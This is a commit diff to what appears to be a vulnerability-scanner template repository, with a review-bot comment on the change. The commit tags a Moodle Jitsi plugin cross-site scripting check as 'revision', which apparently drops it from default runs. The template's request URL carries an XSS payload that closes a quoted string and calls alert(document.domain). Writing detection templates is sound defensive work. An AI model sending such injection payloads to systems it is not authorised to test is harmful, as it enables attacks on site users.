template update

patch-1
sandeep 2021-04-10 13:10:29 +05:30
parent 6b7cc89a97
commit b36ec072d6
2 changed files with 3 additions and 2 deletions


@ -13,6 +13,7 @@ tags:
- "iot"
- "misc"
- "fuzz"
- "revision"
# files is a list of files to ignore template execution
# unless asked for by the user.
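Review bot: The new `"revision"` entry in the `tags:` list has no comment saying what the tag means or when it should be removed again. Judging by the neighbouring comment on `files`, this list appears to exclude matching templates from default runs. The same commit adds `revision` to the moodle jitsi XSS template's tags, so that check would presumably stop running unless a user explicitly asks for it, which quietly reduces default detection coverage. I would add a line above the entry such as `# "revision": templates held back pending review; excluded from default runs` and state in the commit description what is being revised. That wording is a guess at the intent and should be confirmed by the author.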


@ -5,13 +5,13 @@ info:
author: aceseven (digisec360)
description: Cross-site Scripting in moodle jitsi plugin
severity: medium
tags: moodle,jitsi,xss
tags: moodle,jitsi,xss,revision
reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67
requests:
- method: GET
path:
- "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
- "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"
matchers-condition: and
matchers: